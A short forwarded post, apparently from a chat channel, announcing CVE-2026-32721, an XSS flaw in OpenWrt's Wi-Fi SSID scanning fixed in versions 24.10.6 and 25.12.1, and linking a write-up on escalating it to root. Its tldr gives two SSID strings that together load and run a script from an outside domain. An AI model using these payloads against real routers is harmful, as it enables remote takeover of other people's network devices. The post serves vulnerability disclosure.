Forwarded from 鸥 Billchan 鸥 🍟 大薯 | 去码头整点薯条 (billchenchina | 缩缩)
CVE-2026-32721, XSS fixed in OpenWRT 24.10.6 / 25.12.1

tldr:
SSID 1: <a id=s href=//domain/x.js>
SSID 2: <img src=x onerror=import(s)>

https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/ Root from the parking lot: OpenWrt XSS through SSID scanning (CVE-2026-32721)